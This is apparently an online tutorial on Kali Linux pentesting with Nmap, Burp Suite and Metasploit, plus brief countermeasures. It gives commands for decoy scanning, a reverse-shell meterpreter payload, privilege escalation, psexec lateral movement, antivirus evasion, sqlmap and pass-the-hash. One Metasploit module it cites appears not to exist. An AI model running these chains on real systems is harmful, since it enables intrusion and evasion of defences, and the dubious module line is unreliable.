Used by 78% of penetration testers, Kali Linux provides 600+ security tools. This tutorial covers Nmap, Burp Suite, and Metasploit with professional configurations, real-world attack scenarios, and defensive bypass techniques.
Kali Linux: Professional Penetration Testing Tools Guide
Kali Tool Usage in Penetration Tests (2023)
1. Nmap Network Scanning
Essential Scans:
- Discovery:
nmap -sn 192.168.1.0/24 - Port Scan:
nmap -sS -p- -T4 10.10.10.10 - Service Detection:
nmap -sV -sC -O 10.10.10.10
Advanced Techniques:
# Evade firewall with fragmentation
nmap -f -D RND:10 --data-length 24 10.10.10.10
# UDP service scanning
nmap -sU -p 53,67,123,161 10.10.10.10
# NSE script usage
nmap --script vuln,exploit 10.10.10.10
Enterprise Tip:
Use masscan for large networks (1M+ hosts) then verify with Nmap
2. Burp Suite Web Testing
Core Modules:
- Proxy: Intercept and modify requests
- Scanner: Automated vulnerability detection
- Intruder: Custom parameter fuzzing
- Repeater: Manual request manipulation
Professional Configurations:
- Install CA certificate for HTTPS interception
- Configure scope to avoid attacking non-target domains
- Use Collaborator for out-of-band testing
Case Study:
Finding blind XSS via Burp Collaborator callback detection
3. Metasploit Framework
Exploitation Process:
- Search for exploits:
search exploit eternalblue - Configure payload:
set payload windows/x64/meterpreter/reverse_tcp - Execute:
exploit -j
Post-Exploitation:
# Privilege escalation
getsystem
run post/multi/recon/local_exploit_suggester
# Lateral movement
use exploit/windows/smb/psexec
set RHOSTS 192.168.1.5-20
Defensive Bypass:
Use msfvenom -e x86/shikata_ga_nai -i 5 for AV evasion
4. Integrated Attack Scenario
Enterprise Penetration Test:
- Recon: Nmap scan discovers port 443
- Enumeration: Burp finds SQLi in web app
- Exploitation: Metasploit gains shell access
- Post-Exploit: Hashdump → Pass-the-Hash attack
Command Flow:
nmap -sV -p 443 --script=http-sql-injection 10.10.10.10
sqlmap -u "https://10.10.10.10/login" --data="user=admin" --dbs
msfconsole -x "use exploit/multi/http/sql_injection; set RHOSTS 10.10.10.10; exploit"
Kali Tools Cheat Sheet
| Tool | Command | Purpose | Enterprise Use |
|---|---|---|---|
| Nmap | -sS -sV -O | Stealthy scanning | Network audits |
| Burp | Intruder | Parameter fuzzing | Web app testing |
| Metasploit | exploit -j | Background exploits | Red teaming |
5. Defensive Countermeasures
Against Nmap
- Network segmentation
- IDS signature tuning
- Port randomization
Against Burp
- WAF implementation
- Rate limiting
- CSRF tokens
Against Metasploit
- Endpoint detection (EDR)
- Patch management
- Network segmentation
Kali Linux Proficiency Plan
✓ Master 10 Nmap scanning techniques
✓ Complete Burp Academy modules
✓ Exploit 5 HTB machines with Metasploit
✓ Document findings in Dradis
Senior Pentester Insight: The 2023 Offensive Security Report shows testers combining Nmap+Burb+Metasploit find 3x more vulnerabilities. Kali Linux remains the industry standard because its tools mirror real attacker methodologies.
0 Interaction
0 Views
0 Likes
×
